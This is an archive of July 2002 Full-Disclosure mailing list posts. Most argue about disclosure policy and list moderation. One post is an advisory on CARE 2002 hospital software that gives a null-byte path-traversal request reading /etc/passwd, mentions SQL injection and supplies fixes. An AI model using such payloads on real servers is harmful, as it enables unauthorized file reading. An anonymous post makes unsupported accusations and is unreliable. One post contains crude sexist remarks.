"full disclosure" does not mean "make it available as >> fast >> as possible", but rather "here is the information, expect it to leak in >> the next two weeks, so go out and fix the bug". The current bugtraq >> scheme >> enforces that, and I believe they are doing a great job. > We are placing the responsibility with the individual, not with an > organisation here. IMHO an organisation has a greater chance of doing things right than a number of individuals. For example, I do not have a complete list of Linux/BSD/Unix distributors' security contacts, and I believe many others out there haven't either, however such a list is vital for vendor notification. > What we do not believe in is having a situation where > a select few are aware of a problem, but 99% of the internet populace > are > powerless to defend against it. We are not saying that the vendor > should not > be informed, we are saying, inform the people and the vendor > simultaneously. What do you gain by informing the people? Many people running servers are unable to disallow mail relaying on their boxes, why do you expect them to understand how to recompile and reinstall a webserver? Even the few competent admins who could understand an advisory and fix things by themselves might like an official update from a distributor, packaged and ready to install. >> If we are lucky enough >> that the vulnerability is spotted by a whitehat, we should not >> jeopardize >> the time advantage we have by announcing it publically. > This situation already occurs. If a researcher leaks information to a > few > 'allies', if a technique is discovered 'in the wild', or if a vendor > silently > fixes unknown problems, then there are those who possess the knowledge > and > those that don't. We are simply providing a forum for those who wish to > try > and balance out this situation. If some bug is being exploited "in the wild" there is no sense in holding back information; I believe the bugtraq moderators understand that (at least they approved postings stating that something was being exploited already within a few minutes. >> In short, I think this is a bad idea because it adds confusion for the >> vulnerability spotters, risks early disclosure before fixes are >> available >> and thus harms the users. > Early disclosure is important, IMO, as was proved with the recent > Apache flaw. > I believe there were reports of Gobbles' exploit being active in the > wild long > before the patched packages were available, Well, I believe this case was a matter of Gobbles' attitude -- they simply didn't follow the rules by sharing their exploit with other people before the official release date. There will always be people like this (=> "instant fame"), and giving them a forum in which they can publicize their exploits to an even wider audience will not make the problem go away. If that happens it is the same thing as with every other exploit being actively used -- notify everyone instantly, as there is no point in still holding back information. I believe the bugtraq moderators understand this, and approve such postings right away. Simon From listuser at seifried.org Thu Jul 11 21:15:18 2002 From: listuser at seifried.org (Kurt Seifried) Date: Thu, 11 Jul 2002 14:15:18 -0600 Subject: [Full-Disclosure] Re: Announcing new security mailing list References: <00474B8E-9509-11D6-B142-000A278CBB1A@phobos.fs.tum.de> Message-ID: <01d401c22917$ad2a91b0$1400020a@chaser> Perhaps someone can setup full-disclosure-discuss? I thought this list was for announcements, not the tired/boring/painfully stale "am not" "are so" arguments. Plus the anologies will start coming out and those really suck. And then someone will get compared to Hitler and the thread will be closed, so why not head it off at the pass instead? Kurt Seifried, kurt at seifried.org A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574 http://seifried.org/security/ ----- Original Message ----- From: "Simon Richter" To: "John Cartwright" Cc: ; Sent: Thursday, July 11, 2002 2:01 PM Subject: [Full-Disclosure] Re: Announcing new security mailing list > Hi, > > >> To me, the term "full disclosure" does not mean "make it available as > >> fast > >> as possible", but rather "here is the information, expect it to leak in > >> the next two weeks, so go out and fix the bug". The current bugtraq > >> scheme > >> enforces that, and I believe they are doing a great job. > > > We are placing the responsibility with the individual, not with an > > organisation here. > > IMHO an organisation has a greater chance of doing things right than a > number of individuals. For example, I do not have a complete list of > Linux/BSD/Unix distributors' security contacts, and I believe many > others out there haven't either, however such a list is vital for vendor > notification. > > > What we do not believe in is having a situation where > > a select few are aware of a problem, but 99% of the internet populace > > are > > powerless to defend against it. We are not saying that the vendor > > should not > > be informed, we are saying, inform the people and the vendor > > simultaneously. > > What do you gain by informing the people? Many people running servers > are unable to disallow mail relaying on their boxes, why do you expect > them to understand how to recompile and reinstall a webserver? Even the > few competent admins who could understand an advisory and fix things by > themselves might like an official update from a distributor, packaged > and ready to install. > > >> If we are lucky enough > >> that the vulnerability is spotted by a whitehat, we should not > >> jeopardize > >> the time advantage we have by announcing it publically. > > > This situation already occurs. If a researcher leaks information to a > > few > > 'allies', if a technique is discovered 'in the wild', or if a vendor > > silently > > fixes unknown problems, then there are those who possess the knowledge > > and > > those that don't. We are simply providing a forum for those who wish to > > try > > and balance out this situation. > > If some bug is being exploited "in the wild" there is no sense in > holding back information; I believe the bugtraq moderators understand > that (at least they approved postings stating that something was being > exploited already within a few minutes. > > >> In short, I think this is a bad idea because it adds confusion for the > >> vulnerability spotters, risks early disclosure before fixes are > >> available > >> and thus harms the users. > > > Early disclosure is important, IMO, as was proved with the recent > > Apache flaw. > > I believe there were reports of Gobbles' exploit being active in the > > wild long > > before the patched packages were available, > > Well, I believe this case was a matter of Gobbles' attitude -- they > simply didn't follow the rules by sharing their exploit with other > people before the official release date. There will always be people > like this (=> "instant fame"), and giving them a forum in which they can > publicize their exploits to an even wider audience will not make the > problem go away. > > If that happens it is the same thing as with every other exploit being > actively used -- notify everyone instantly, as there is no point in > still holding back information. I believe the bugtraq moderators > understand this, and approve such postings right away. > > Simon > > _______________________________________________ > Full-Disclosure mailing list > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > From dufresne at winternet.com Fri Jul 12 00:24:41 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Thu, 11 Jul 2002 18:24:41 -0500 (CDT) Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <01d401c22917$ad2a91b0$1400020a@chaser> Message-ID: Dang! I always liked the Hitler comparisons... ...practically live on analogies... Thanks, Ron DuFresne On Thu, 11 Jul 2002, Kurt Seifried wrote: > Perhaps someone can setup full-disclosure-discuss? I thought this list was > for announcements, not the tired/boring/painfully stale "am not" "are so" > arguments. Plus the anologies will start coming out and those really suck. > And then someone will get compared to Hitler and the thread will be closed, > so why not head it off at the pass instead? > > > Kurt Seifried, kurt at seifried.org > A15B BEE5 B391 B9AD B0EF > AEB0 AD63 0B4E AD56 E574 > http://seifried.org/security/ > > > ----- Original Message ----- > From: "Simon Richter" > To: "John Cartwright" > Cc: ; > Sent: Thursday, July 11, 2002 2:01 PM > Subject: [Full-Disclosure] Re: Announcing new security mailing list > > > > Hi, > > > > >> To me, the term "full disclosure" does not mean "make it available as > > >> fast > > >> as possible", but rather "here is the information, expect it to leak in > > >> the next two weeks, so go out and fix the bug". The current bugtraq > > >> scheme > > >> enforces that, and I believe they are doing a great job. > > > > > We are placing the responsibility with the individual, not with an > > > organisation here. > > > > IMHO an organisation has a greater chance of doing things right than a > > number of individuals. For example, I do not have a complete list of > > Linux/BSD/Unix distributors' security contacts, and I believe many > > others out there haven't either, however such a list is vital for vendor > > notification. > > > > > What we do not believe in is having a situation where > > > a select few are aware of a problem, but 99% of the internet populace > > > are > > > powerless to defend against it. We are not saying that the vendor > > > should not > > > be informed, we are saying, inform the people and the vendor > > > simultaneously. > > > > What do you gain by informing the people? Many people running servers > > are unable to disallow mail relaying on their boxes, why do you expect > > them to understand how to recompile and reinstall a webserver? Even the > > few competent admins who could understand an advisory and fix things by > > themselves might like an official update from a distributor, packaged > > and ready to install. > > > > >> If we are lucky enough > > >> that the vulnerability is spotted by a whitehat, we should not > > >> jeopardize > > >> the time advantage we have by announcing it publically. > > > > > This situation already occurs. If a researcher leaks information to a > > > few > > > 'allies', if a technique is discovered 'in the wild', or if a vendor > > > silently > > > fixes unknown problems, then there are those who possess the knowledge > > > and > > > those that don't. We are simply providing a forum for those who wish to > > > try > > > and balance out this situation. > > > > If some bug is being exploited "in the wild" there is no sense in > > holding back information; I believe the bugtraq moderators understand > > that (at least they approved postings stating that something was being > > exploited already within a few minutes. > > > > >> In short, I think this is a bad idea because it adds confusion for the > > >> vulnerability spotters, risks early disclosure before fixes are > > >> available > > >> and thus harms the users. > > > > > Early disclosure is important, IMO, as was proved with the recent > > > Apache flaw. > > > I believe there were reports of Gobbles' exploit being active in the > > > wild long > > > before the patched packages were available, > > > > Well, I believe this case was a matter of Gobbles' attitude -- they > > simply didn't follow the rules by sharing their exploit with other > > people before the official release date. There will always be people > > like this (=> "instant fame"), and giving them a forum in which they can > > publicize their exploits to an even wider audience will not make the > > problem go away. > > > > If that happens it is the same thing as with every other exploit being > > actively used -- notify everyone instantly, as there is no point in > > still holding back information. I believe the bugtraq moderators > > understand this, and approve such postings right away. > > > > Simon > > > > _______________________________________________ > > Full-Disclosure mailing list > > Full-Disclosure at lists.netsys.com > > http://lists.netsys.com/mailman/listinfo/full-disclosure > > > > _______________________________________________ > Full-Disclosure mailing list > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From BlueBoar at thievco.com Fri Jul 12 02:00:25 2002 From: BlueBoar at thievco.com (Blue Boar) Date: Thu, 11 Jul 2002 18:00:25 -0700 Subject: [Full-Disclosure] Re: Announcing new security mailing list References: <3D2DAC85.4010200@thievco.com> <20020711120054.E1270@techmonkeys.org> Message-ID: <3D2E2A29.2000808@thievco.com> Matthew S. Hallacy wrote: > I disagree, I think my DOCSIS vulnerability posting is a good example of > something that should have gone out immediately, but was /never/ posted. > ( I ended up taking it to another list) > > It was valid, the vendors knew, but it was withheld because you deemed it > 'malicious'. "You", meaning who? Not I.. it went to my list: http://online.securityfocus.com/archive/82/261280 I have my own set of (often harsher) standards for what posts I allow on vuln-dev... but that has nothing to do with Bugtraq. I assume you mean Dave, whose reply is here: http://online.securityfocus.com/archive/82/261454 I suppose you can accuse him of not stating his standards well enough up front for what kinds of messages he considers fraud instructions. I might not have approved the original message either. For messages like that, I'm often torn between my policy of not allowing posts that tell that a particular site is vulnerable to a hole only they can fix, and allowing the poster to implicate themself for the poking around they've done. It kinda depends if I feel like I've been made an accessory. If so, I'll usually approve it for the world to see. Or, maybe forward to the FBI. I haven't had occasion to do the latter yet. The point being, that has nothing to do with the Bugtraq moderator holding posts so he can warn a vendor to make a fix. In your case, if I'm reading the headers correctly, there were only about 6 hours between when you sent the note to Bugtraq, and decided it wasn't going to be posted? BB From steve at entrenchtech.com Fri Jul 12 03:37:02 2002 From: steve at entrenchtech.com (Steve) Date: Thu, 11 Jul 2002 20:37:02 -0600 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <3D2E2A29.2000808@thievco.com> Message-ID: <002901c2294d$041a5390$6401a8c0@Laptop2> > I suppose > you can accuse him of not stating his > standards well enough up > front for what kinds of messages he considers fraud instructions. Typically Dave (the Bugtraq moderator) will return the rejected post with comments as to why it was rejected. I can't speak for Dave or Security Focus but in my experience I have seen comments come back as to why a message is being rejected come back from Dave. > I might not have approved the original message either. For > messages like > that, I'm often torn between my policy of not allowing posts > that tell that > a particular site is vulnerable to a hole only they can fix, > and allowing > the poster to implicate themself for the poking around > they've done. It > kinda depends if I feel like I've been made an accessory. If > so, I'll > usually approve it for the world to see. Or, maybe forward > to the FBI. I > haven't had occasion to do the latter yet. I think in the case when you have a post that is clearly something illegal - ie: "I just hacked XXX Corp and here is how" then of course you aren't going to post it -- you will probably forward it on to the proper authorities and hope you don't get implicated. But in the case of the DOCSIS post -- it was nothing illegal so why the questions? Of course this is just my observation from outside the whole issue. This reminds me of when I started Win2KSecAdvice - I had some assclown email me saying that he just "0wn3d Microsoft using RFP's RDS exploit" which I obviously thought was a false claim and post but I forwarded it off to the proper people and never let it hit the list. > In your case, if I'm reading the headers correctly, there > were only about 6 > hours between when you sent the note to Bugtraq, and decided > it wasn't > going to be posted? Six hours isn't to out of the question as an expectation but what the poster needs to understand that the larger the mailing list, the longer it is going to take mail to be processed. Also, there is refference in Mathew's post about his post not being accepted or rejected by Bugtraq -- just deleted. Bugtraq runs on the same mailing list software as VulnWatch and there is no way in only six hours that a poster would know that his post was simply ignored. The options to a moderator are, ACCEPT, DENY, or ignore. If you ignore, the message must time out before the poster is notified that it was not acted upon (and in some cases this notification is never sent). I am not saying that I agree with this post not being sent to Bugtraq I am simply trying to give a moderators perspective on how some of the common mailing list apps work. Just my .02$ on a subject that is probably getting beaten to death. Regards; Steve Manzuik Founder & Technical Lead Entrench Technologies www.entrenchtech.com Moderator - VulnWatch www.vulnwatch.org -=-=-=-=-=-=-=-=-=-=-=- www.csicon.net -=-=-=-=-=-=-=-=-=-=-=- From SkyLined at edup.tudelft.nl Fri Jul 12 04:21:58 2002 From: SkyLined at edup.tudelft.nl (Berend-Jan Wever) Date: Fri, 12 Jul 2002 05:21:58 +0200 Subject: [Full-Disclosure] Flare References: <002901c2294d$041a5390$6401a8c0@Laptop2> Message-ID: <001001c22953$481a1b10$1b59a182@grotedoos> Can anybody (moderator !?) pleas stop this flare and upen a special full-disclosure-flare at whatever.com mailinglist ? Berend-Jan Wever aka SkyLined http://spoor12.edup.tudelft.nl -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020712/750b26b3/attachment.html From poptix at techmonkeys.org Fri Jul 12 05:34:39 2002 From: poptix at techmonkeys.org (Matthew S. Hallacy) Date: Thu, 11 Jul 2002 23:34:39 -0500 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <3D2E2A29.2000808@thievco.com>; from BlueBoar@thievco.com on Thu, Jul 11, 2002 at 06:00:25PM -0700 References: <3D2DAC85.4010200@thievco.com> <20020711120054.E1270@techmonkeys.org> <3D2E2A29.2000808@thievco.com> Message-ID: <20020711233439.I1270@techmonkeys.org> On Thu, Jul 11, 2002 at 06:00:25PM -0700, Blue Boar wrote: > "You", meaning who? Not I.. it went to my list: > http://online.securityfocus.com/archive/82/261280 > > I have my own set of (often harsher) standards for what posts I allow on > vuln-dev... but that has nothing to do with Bugtraq. > > I assume you mean Dave, whose reply is here: > http://online.securityfocus.com/archive/82/261454 Sorry, it was Dave, I kind of see securityfocus as one large group.. > > I suppose you can accuse him of not stating his standards well enough up > front for what kinds of messages he considers fraud instructions. How is it any different from someone writing an exploit and posting it to the list? I didn't even include any scripts for it, I merely explained the process (I did have people, such as 3Com (who still claim there is no problem) say that it was not an issue with their product(s)). > > I might not have approved the original message either. For messages like > that, I'm often torn between my policy of not allowing posts that tell that > a particular site is vulnerable to a hole only they can fix, and allowing > the poster to implicate themself for the poking around they've done. It > kinda depends if I feel like I've been made an accessory. If so, I'll > usually approve it for the world to see. Or, maybe forward to the FBI. I > haven't had occasion to do the latter yet. I didn't view it as illegal, I had been repeatedly informed by AT&T that any speed limitations were due to hardware limitations, and that I should feel free to download all the 'tweaks' available online, etc etc. Never would they admit to having capped the service (I have the emails to/from the AT&T tech support rep stating this) > > The point being, that has nothing to do with the Bugtraq moderator holding > posts so he can warn a vendor to make a fix. It's about censoring valid content based on a single persons feelings. > > In your case, if I'm reading the headers correctly, there were only about 6 > hours between when you sent the note to Bugtraq, and decided it wasn't > going to be posted? Actually I had posted it that Friday, I waited until Monday ~2pm and re-sent it (thus the 'lets try this again' comment), only at that point did I recieve a message back from the moderator that he was not going to allow it through, with no explanation. 6 hours later I posted it to vuln-dev > BB -- Matthew S. Hallacy FUBAR, LART, BOFH Certified http://www.poptix.net GPG public key 0x01938203 From vanja at pobox.com Fri Jul 12 09:10:10 2002 From: vanja at pobox.com (Vanja Hrustic) Date: Fri, 12 Jul 2002 15:10:10 +0700 Subject: [Full-Disclosure] Flare In-Reply-To: References: <001001c22953$481a1b10$1b59a182@grotedoos> Message-ID: <20020712151010.59227b71.vanja@pobox.com> On Fri, 12 Jul 2002 02:28:52 -0500 (CDT) Erik Parker wrote: > there is security focus if you want discussions. There is no such thing as "discussion through moderation". Security-focus runs "informative" lists, not "discussion" lists. I don't complain though, since they still provide valuable information. If people don't like what they see on this list, why they choose to complain, instead to unsubscribe?. The whole point of unmoderated list is that everyone has the right to say what they want to say, not what someone else wants to hear. I, for one, like to have a chance to see what anyone has to say. Bashing security-focus, lame advisories, script kiddies. I Don't care. As long as it's not moderated. Bashing will stop, list might or might not die. We'll see. Vanja From lupe at lupe-christoph.de Fri Jul 12 09:52:11 2002 From: lupe at lupe-christoph.de (Lupe Christoph) Date: Fri, 12 Jul 2002 10:52:11 +0200 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: References: Message-ID: <20020712085211.GB24030@lupe-christoph.de> On Thursday, 2002-07-11 at 13:10:29 -0500, Ron DuFresne wrote: > On Thu, 11 Jul 2002, Marc Slemko wrote: > > BTW, spewing "[full-disclosure]" into the subject line is a very annoying > > thing for a list to do. > Actually, it makes it quite easy for procmail recipies and certain mail > readers to filter and categorize the messages. What gets annoying is when > there's a ton of html crap preceeding messages, or those folks spewing > vactions into the lists. Not to mention those danged content filters that > are set to prevent folks from being offended by words like damn... My procmail recipe, which does not use the Subject: line: :0: * ^List-Id: .* /home/lupe/Incoming/full-disclosure I prefer to use List-Id because the list might change the insertion of the list tag in the SUbject: line, but List-Id: is generated by the list software which normally changes very infrequently. Lupe Christoph PS: Since I file each mailing list in a separate file, I find the list name tag in the Subject: line redundant. -- | lupe at lupe-christoph.de | http://www.lupe-christoph.de/ | | I have challenged the entire ISO-9000 quality assurance team to a | | Bat-Leth contest on the holodeck. They will not concern us again. | | http://public.logica.com/~stepneys/joke/klingon.htm | From dufresne at winternet.com Fri Jul 12 13:27:21 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Fri, 12 Jul 2002 07:27:21 -0500 (CDT) Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <002901c2294d$041a5390$6401a8c0@Laptop2> Message-ID: On Thu, 11 Jul 2002, Steve wrote: > > I suppose > > you can accuse him of not stating his > > standards well enough up > > front for what kinds of messages he considers fraud instructions. > > Typically Dave (the Bugtraq moderator) will return the rejected post > with comments as to why it was rejected. I can't speak for Dave or > Security Focus but in my experience I have seen comments come back as to > why a message is being rejected come back from Dave. > With the new mailman SW the poster gets a standard rejection/denied form e-mail back . It is then up to the original poster to try and contact the list admin as to the reason behind the denial of their post. Sometimes, depending upon the list and list administrator in question they will get something with meat in the form of a reason back, sometimes they are silently ignored . What has been interesting on this end has been the vapid increase in rejections of postings due to the fact the list maintainer thought the posting in question would generate "too much" discussion and they had not the time to deal with the increased posting flow through their list. We've found this an interesting *rationale*, on the stifeling side as pertains open discussion and the learning process [SNIP] Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From nobody at dizum.com Fri Jul 12 02:50:07 2002 From: nobody at dizum.com (Nomen Nescio) Date: Fri, 12 Jul 2002 03:50:07 +0200 (CEST) Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! Message-ID: <20020712015007.38EC318FBD@mail.zedz.net> X-Originating IP: 66.38.151.9 Message-ID: Big Gay Al's Full Disclosure #001: big gay al feels it important the following is disclosed fully On the $cR!pT k!dDi3$ mailing list - big gay al's evil twin constantly advertise and endorse CORE-SDI product but does not tell that Security Focus seniors are all investors in CORE-SDI. Biased and misleading. Daddy must need new car. Bugtraq moderator will not post your message if you are GOBBLES or not liked. Your post will be added to the for sale database. There is no latency in Bugtraq all posts go out after the bug is entered in to the for sale database and all paying customers are informed. CVE must die and Bugtraq ID must live. All mailing lists not ran by securityfocus must die. If other list exist then bugtraq worthless and not make money. If other list die then bugtraq be the only one and start charging. make money off backs of smart people. hire sheep. ;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p death to anti.security.ls death to project mayhem Security Focus wants to be to security what Microsoft is to desktop Does not ISS own this title foo=man+chu From avart at gmx.de Fri Jul 12 14:27:55 2002 From: avart at gmx.de (avart at gmx.de) Date: Fri, 12 Jul 2002 15:27:55 +0200 (MEST) Subject: [Full-Disclosure] Several problems in CARE 2002 Message-ID: <25962.1026480475@www9.gmx.net> Several problems in CARE 2002 ------------------------------------- # What is CARE 2002? CARE 2002 is a free software package for hospitals. It's based on php + mysql. For further information visit . #### include + NULL problem #### # Problem description There are several include statements which use variables passed by the user. So if register_globals is on and magic_quotes_gpc is off you are able to read any file on the webserver: ./main/cafenews.php: [...] include("../language/".$lang."/lang_".$lang."_newsdummy.php"); [...] If $lang contains NULL (aka \0 or %00) the include statement ignores everything after the NULL and includes the file. Here's some metacode explaining the behavior: foobar.php looks like this: Calling the file with the following parameter: foobar.php?input=bla%00bla results in (with enabled magic_quotes_gcp):
Warning: Failed opening '../bla\0blablubb' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
This doesn't seem to be exploitable, but what happens, if magic_quotes_gcp is turned off (like on php.ini-recommened, for performance reasons, without pointing to THIS kind of problem)?:
Warning: Failed opening '../bla' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
Huh?! Did you get it? Everything after NULL (%00) is ignored! So what can we do now? We can take a look at the avaiable users: foobar.php?input=../../../etc/passwd%00 Voila... You can open every file you want. Ok, not every file. It has to be readable by the http-user, like wwwrun or www. # And the solution? One can test, if a file exists with the function file_exists(). This function doesn't ignore the characters after NULL. On the other side, one could try to avoid using userdata to open a file. In CARE 2002 and other webapps, you are often faced to this kind of problem while handling language or themes files. # Fix? The authors will release a new version (1.0.0.2) at . The best way for a admin is, to enable magic_quotes_gpc and/or other security related options in php. For further information take a look at: . Other options, like enable_safe_mode or open_base_dir helps you too, to keep your server privacy if you can't trust the executed phpcode. #### missing addslashes() #### # Problem description None of the data passed (there are just a few exeptions) to the mysqld is checked for control characters like ', " et al. So one is able to commit injected sql queries. The problem exists, when magic_quotes_gpc is turned off. For further information about dangerous sql queries see: *. * # And the solution? One can use addslashes() for _every_ data a user enters and is submitted to the database. Lazy people hope, that magic_quotes_gpc is enabled. Never expect, that an admin configured a webserver correct, try to start the security at application level. # Fix? Within the new release, the author fixed the problems. Turn magic_quotes_qpc on! ##### Credits ##### Thanks skyp, for cross reading the text. For the german-speaking folk: Sorry for the broken lines I hate webmailer :). -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net From johnc at grok.org.uk Fri Jul 12 14:48:33 2002 From: johnc at grok.org.uk (John Cartwright) Date: Fri, 12 Jul 2002 14:48:33 +0100 Subject: [Full-Disclosure] List Charter Message-ID: <20020712134833.GA547@www1.grok.org.uk> Hi Now that we've established why we're here, and decided that since we *are* here, we don't need to defend our position, its time to get down to business. We're contemplating the creation of a list charter, and welcome your ideas. Whether this occurs on- or off-list is entirely up to you, the members. If we can clean up these issues promptly then we can quickly move toward a more relevant discussion in the future. Thanks - John From dotslash at snosoft.com Fri Jul 12 02:55:26 2002 From: dotslash at snosoft.com (KF) Date: Thu, 11 Jul 2002 21:55:26 -0400 Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! References: <20020712015007.38EC318FBD@mail.zedz.net> Message-ID: <3D2E370E.3010809@snosoft.com> Ok guys... can we take the bugtraq / vuln-dev / other mailing list flaming crap elsewhere... I have been on this list for a day or so since the initial advertisement and its already become extrememly annoying and worthless.... I do not need my inbox flooded with ALERT ALERT ALERT for some kind of worthless statements dissing on bugtraq.... I signed up for this in hopes of having another useful source of info. Instead I see my self unsubscribing from this list very soon and probably never posting here if things don't change. Nearly 100% of the mail from this list is talk... go find some holes people.... post some exploits ... but for christs sakes take the BS offline or in private emails. -KF Nomen Nescio wrote: >X-Originating IP: 66.38.151.9 >Message-ID: > >Big Gay Al's Full Disclosure #001: > > >big gay al feels it important the following is disclosed fully > >On the $cR!pT k!dDi3$ mailing list - big gay al's evil twin constantly advertise and endorse CORE-SDI product but does not tell that Security Focus seniors are all investors in CORE-SDI. Biased and misleading. Daddy must need new car. > >Bugtraq moderator will not post your message if you are GOBBLES or not liked. Your post will be added to the for sale database. There is no latency in Bugtraq all posts go out after the bug is entered in to the for sale database and all paying customers are informed. > >CVE must die and Bugtraq ID must live. All mailing lists not ran by securityfocus must die. If other list exist then bugtraq worthless and not make money. If other list die then bugtraq be the only one and start charging. make money off backs of smart people. hire sheep. > >;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p > >death to anti.security.ls >death to project mayhem >Security Focus wants to be to security what Microsoft is to desktop >Does not ISS own this title > >foo=man+chu > >_______________________________________________ >Full-Disclosure mailing list >Full-Disclosure at lists.netsys.com >http://lists.netsys.com/mailman/listinfo/full-disclosure > > From simon at snosoft.com Fri Jul 12 15:05:22 2002 From: simon at snosoft.com (ATD) Date: 12 Jul 2002 10:05:22 -0400 Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! In-Reply-To: <3D2E370E.3010809@snosoft.com> References: <20020712015007.38EC318FBD@mail.zedz.net> <3D2E370E.3010809@snosoft.com> Message-ID: <1026482723.1674.12.camel@localhost.localdomain> You beat me to it man. On Thu, 2002-07-11 at 21:55, KF wrote: > Ok guys... can we take the bugtraq / vuln-dev / other mailing list > flaming crap elsewhere... I have been on this list for a day or so since > the initial advertisement and its already become extrememly annoying and > worthless.... I do not need my inbox flooded with ALERT ALERT ALERT for > some kind of worthless statements dissing on bugtraq.... I signed up for > this in hopes of having another useful source of info. > > Instead I see my self unsubscribing from this list very soon and > probably never posting here if things don't change. Nearly 100% of the > mail from this list is talk... go find some holes people.... post some > exploits ... but for christs sakes take the BS offline or in private > emails. > -KF > > Nomen Nescio wrote: > > >X-Originating IP: 66.38.151.9 > >Message-ID: > > > >Big Gay Al's Full Disclosure #001: > > > > > >big gay al feels it important the following is disclosed fully > > > >On the $cR!pT k!dDi3$ mailing list - big gay al's evil twin constantly advertise and endorse CORE-SDI product but does not tell that Security Focus seniors are all investors in CORE-SDI. Biased and misleading. Daddy must need new car. > > > >Bugtraq moderator will not post your message if you are GOBBLES or not liked. Your post will be added to the for sale database. There is no latency in Bugtraq all posts go out after the bug is entered in to the for sale database and all paying customers are informed. > > > >CVE must die and Bugtraq ID must live. All mailing lists not ran by securityfocus must die. If other list exist then bugtraq worthless and not make money. If other list die then bugtraq be the only one and start charging. make money off backs of smart people. hire sheep. > > > >;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p > > > >death to anti.security.ls > >death to project mayhem > >Security Focus wants to be to security what Microsoft is to desktop > >Does not ISS own this title > > > >foo=man+chu > > > >_______________________________________________ > >Full-Disclosure mailing list > >Full-Disclosure at lists.netsys.com > >http://lists.netsys.com/mailman/listinfo/full-disclosure > > > > > > > > _______________________________________________ > Full-Disclosure mailing list > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > -- That file you've been guarding, isn't. ------------------------------------------------------------------- ______________________________ / _____/\______ \__ ___/ | Secure Network Operations \_____ \ | _/ | | | http://www.snosoft.com / \ | | \ | | | recon at snosoft.com /_______ / |____|_ / |____| | \/ \/ | Project Cerebrum -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 232 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020712/fd253d30/attachment.bin From dotslash at snosoft.com Fri Jul 12 03:11:14 2002 From: dotslash at snosoft.com (KF) Date: Thu, 11 Jul 2002 22:11:14 -0400 Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! References: <20020712015007.38EC318FBD@mail.zedz.net> <3D2E370E.3010809@snosoft.com> <1026482723.1674.12.camel@localhost.localdomain> Message-ID: <3D2E3AC2.5080802@snosoft.com> I have sand in my vagina! man they remind me of wining bitches at the beach... hows SCO? -KF From ARouse at n2bb.com Fri Jul 12 15:17:39 2002 From: ARouse at n2bb.com (Alan Rouse) Date: Fri, 12 Jul 2002 10:17:39 -0400 Subject: [Full-Disclosure] List Charter Message-ID: <382BC0C28F397F4785E7414B8279F5271B530E@n2-atl-exch.it.n2bb.com> My interest is in the earliest possible warning of what the bad guys are currently trying to do to systems like mine. I don't care who it comes from, or whether it is presented in a businesslike manner, as long as it contains useful information. I'm interested in proof of concept code, actual exploit code, artifacts from actual attacks, theoretical vulnerabilities discovered by code reviews, defensive tactics, links to ongoing discussions, educational q & a, or anything else that might make me aware of potential mayhem and how to prepare for it. I'm not interested in flame wars or philosophical arguments. They don't help me do my job. From dotslash at snosoft.com Fri Jul 12 03:20:09 2002 From: dotslash at snosoft.com (KF) Date: Thu, 11 Jul 2002 22:20:09 -0400 Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! References: <20020712015007.38EC318FBD@mail.zedz.net> <3D2E370E.3010809@snosoft.com> <1026482723.1674.12.camel@localhost.localdomain> <3D2E3AC2.5080802@snosoft.com> Message-ID: <3D2E3CD9.8090808@snosoft.com> Hahah my bad people ... this was not supposed to go to the list ... but yes I was refering to all of you that are wining entirely too much about bugtraq / vuln-dev / etc... you sound like women at the beach...Hope I didn't offend any ladies out there. =] Someone post a bug or something so we can get off this topic. KF wrote: > I have sand in my vagina! man they remind me of wining bitches at the > beach... > hows SCO? > -KF > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > From len at netsys.com Fri Jul 12 15:25:37 2002 From: len at netsys.com (Len Rose) Date: Fri, 12 Jul 2002 10:25:37 -0400 Subject: [Full-Disclosure] Suggestion/Comments Message-ID: <20020712102537.T24902@netsys.com> One thing you can do to help out with the signal to noise ratio might be to help spread the word about this list and the premise behind it. If you work for a company or organization that generates advisories, and other types of intelligence it 